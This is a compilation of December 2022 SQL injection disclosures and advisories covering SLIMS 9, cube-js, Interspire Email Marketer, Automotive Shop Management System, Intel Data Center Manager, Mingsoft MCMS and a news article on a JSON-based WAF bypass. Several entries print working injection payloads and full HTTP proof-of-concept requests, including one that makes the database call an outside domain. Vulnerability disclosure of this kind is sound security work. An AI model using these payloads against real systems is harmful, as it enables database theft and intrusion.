Senayan Library Management System 9.1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin## Description:The manual insertion `point 3` with the `class` parameter appears tobe vulnerable to SQL injection attacks.A single quote was submitted in the manual insertion `point 3`, and ageneral error message was returned.Two single quotes were then submitted and the error message disappeared.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND'iuDJ'='iuDJ&membershipType=a''&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin)## Proof and Exploit:[href](https://streamable.com/qptgmu)## Time spent`01:00:00`System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Senayan Library Management System 9.1.0 SQL Injection

Senayan Library Management System version 9.0.l0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi## Description:The manual insertion `point 3` with `class` parameter appears to bevulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'was submitted in the manual insertion point 3.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND'dLjf'='dLjf&membershipType=a&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)## Proof and Exploit:[href](http://localhost:5001/sy5wji)## Time spent`03:00:00`

Senayan Library Management System 9.0.0 SQL Injection

cube-js is a headless business intelligence platform. In version 0.31.23 all authenticated Cube clients could bypass SQL row-level security and run arbitrary SQL via the newly introduced /v1/sql-runner endpoint. This issue has been resolved in version 0.31.24. Users are advised to either upgrade to 0.31.24 or to downgrade to 0.31.22. There are no known workarounds for this vulnerability.

High

bsod90 published GHSA-6jqm-3c9g-pch7

Dec 9, 2022

**Package**

npm @cubejs-backend/api-gateway (npm)

**Affected versions**

0.31.23

**Patched versions**

0.31.24

**Description**

**Impact**

All authenticated Cube clients could bypass row-level security and run arbitrary SQL via the newly introduced /v1/sql-runner endpoint.

**Patches**

The change has been reverted in 0.31.24

**Workarounds**

Upgrade to >=0.31.24 or downgrade to <=0.31.22

**Severity**

High

7.7

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

Low

User interaction

None

Scope

Changed

Confidentiality

High

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**CVE ID**

CVE-2022-23510

**Weaknesses**

No CWEs

CVE-2022-23510: Row level security bypass

Interspire Email Marketer through 6.5.1 allows SQL Injection via the surveys module. An unauthenticated attacker could successfully perform an attack to extract potentially sensitive information from the database if the survey id exists.

Interspire Email Marketer version 6.0.0 up to and including 6.5.1 allows SQL injection in the Surveys module. If the survey id exists, an unauthenticated attacker could exploit this to extract potentially sensitive information from the database.

**We recommend that all users of Email Marketer immediately take one of the following corrective actions.****If you are not using the survey functionality of Email Marketer:**

*   Disable the survey add on from the addon management screen:

Disable the Surveys Addon

*   Backup and delete the file ~/surveys.php

Or

**If you are using the survey functionality of Email Marketer:**

*   Download the updated version surveys.php
*   Backup and delete the file ~/surveys.php
*   Unzip the updated version of surveys.php in your installation directory

Or

**Update to the latest version of Email Marketer:**

If you have an active download link, get and update to the latest version of Email Marketer which at the time of this writing is version 6.5.2.

The CVE number is CVE-2022-44790. Discovered by Tungbx of VPS Securities.

CVE-2022-44790: Security Bulletin. Vulnerability found in Email Marketer v6.0.0 through v6.5.1 - Interspire

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Dec. 2 and Dec. 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for December 2 to December 9

Automotive Shop Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /services/view_service.php.

Permalink

Cannot retrieve contributors at this time

**Automotive Shop Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: DaLao

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /asms/admin/services/view\_service.php?id=

Vulnerability location: /asms/admin/services/view\_service.php?id=, id

dbname =asms\_db,length=7

\[+\] Payload: /asms/admin/services/view\_service.php?id=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /asms/admin/services/view\_service.php?id\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0bfse7548hblm5lblclp48r057; dou\_member\_id=1; dou\_member\_code=3a2d7d2301afce4cf127
Connection: close

CVE-2022-44838: bug_report/SQLi-1.md at main · GkaMei/bug_report

Intel Data Center Manager's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" is vulnerable to an authenticated, blind SQL injection attack when user-supplied input to the HTTP POST parameter "dataName" is processed by the web application. Versions 4.1 and below are affected.

    RCE Security Advisoryhttps://www.rcesecurity.com1. ADVISORY INFORMATION=======================Product:        Intel Data Center ManagerVendor URL:     https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.htmlType:           SQL Injection [CWE-89]Date found:     2022-01-21Date published: 2022-12-01CVSSv3 Score:   9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)CVE:            CVE-2022-212252. CREDITS==========This vulnerability was discovered and researched by Julien Ahrens fromRCE Security.3. VERSIONS AFFECTED====================Intel Data Center Manager 4.1 and below4. INTRODUCTION===============Energy costs are the fastest rising expense for today’s data centers. Intel® DataCenter Manager (Intel® DCM) provides real-time power and thermal consumption data,giving you the clarity you need to lower power usage, increase rack density, andprolong operation during outages.(from the vendor's homepage)5. VULNERABILITY DETAILS========================Intel DCM's endpoint at "/DcmConsole/DataAccessServlet?action=getRoomRackData" isvulnerable to an authenticated, blind SQL Injection when user-supplied input tothe HTTP POST parameter "dataName" is processed by the web application.Since the application does not properly validate and sanitize this parameter, anattacker can inject arbitrary SQL commands against the PostgreSQL backenddatabase server of the web application.Successful exploits can allow an authenticated attacker (the lowest possibleauthorization level "Guest" is sufficient) to read and modify database contentsand execute any system commands on the underlying operating system. This way,the attacker can compromise the system's entire confidentiality, integrity, andavailability.6. PROOF OF CONCEPT===================POST /DcmConsole/DataAccessServlet?action=getRoomRackData HTTP/1.1Host: [ip-address]Cookie: JSESSIONID=[session-id]Content-Length: 153Accept: application/json, text/plain, */*Content-Type: text/plainUser-Agent: Mozilla/5.0Accept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Connection: close{"antiCSRFId":"[your-anti-csrf-id]","requestObj":{"snapshotId":1,"roomId":1,"dataName":"test');SELECT PG_SLEEP(5)--"}}(see the referenced blog post for more details)7. SOLUTION===========Update at least to version 5.0.0.46307.8. REPORT TIMELINE==================2022-01-21: Discovery of the vulnerability2022-01-21: Reported to vendor via their bug bounty program2022-01-21: Vendor response: Sent to "appropriate reviewers"2022-02-08: Vendor acknowledges the vulnerability with a severity of "medium" without sharing their CVSS calculation2022-02-15: Endless back-and-forth discussions about the rating. Vendor proposes a rating of 6.82022-02-16: I don't accept the rating because the vendor downplayed it2022-02-25: After discussions, vendor rates issue as CVSS 9.0 (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)2022-02-25: Apparently AV:A is still wrong, but I don't have more energy to fight them. However this advisory contains the proper CVSS rating.2022-xx-xx: Vendor releases version 5.0.0.46307 which includes the fix2022-08-09: Vendor releases advisory INTEL-SA-006622022-12-01: Public disclosure9. REFERENCES==============https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.htmlhttps://github.com/MrTuxracer/advisories

Intel Data Center Manager 4.1 SQL Injection

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Planet eStream Code Execution / SQL Injection / XSS / Broken Control

Five vendors act to thwart generic hack

Security researchers have developed a technique that prevents web application firewalls (WAFs) from detecting SQL injection attacks.

Several leading vendors’ WAFs failed to support JSON syntax in their SQL injection inspection process, allowing security researchers from Claroty’s Team82 to “prepend JSON syntax to a SQL statement that blinded a WAF to the malicious code”.

The hack worked against WAFs from five leading vendors: Palo Alto Networks, Amazon Web Services, Cloudflare, F5, and Imperva.

All five have updated their products to support JSON syntax in their SQL injection inspection process, clearing the way for Claroty to publish a technical blog post detailing its research.

Catch up with the latest security research news

Prior to recent security updates, attackers using the JSON-based hack would have been able to bypass the WAF’s protection in attempts to exfiltrate data or mount other potential attacks.

“Major WAF vendors lacked JSON support in their products, despite it being supported by most database engines for a decade,” Claroty notes.

“We believe that other vendors’ products may be affected, and that reviews for JSON support should be carried out.”

JSON is a standard file and data exchange format, often used to exchange data between a server and a web application.

The generic WAF bypass was covered by Team82 during the course of unrelated research (specifically into Cambium Networks’ wireless device management platform) that was being thwarted by a web application firewall.

IoT and OT processes that are monitored and managed from the cloud are most at risk from the issue, according to Claroty. “Organizations should ensure they’re running updated versions of security tools in order to block these bypass attempts,” it advised.

The Daily Swig asked Claroty to clarify what classes of security tools might be vulnerable to this kind of exploit, among other questions. No word back as yet but we’ll update this story as and when more information comes to hand.

YOU MIGHT ALSO LIKE Go SAML library vulnerable to authentication bypass

JSON syntax hack allowed SQL injection payloads to be smuggled past WAFs

A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.

**Mingsoft MCMS vulnerable to SQL Injection**

High severity GitHub Reviewed Published Dec 9, 2022 • Updated Dec 9, 2022

Tag

#sql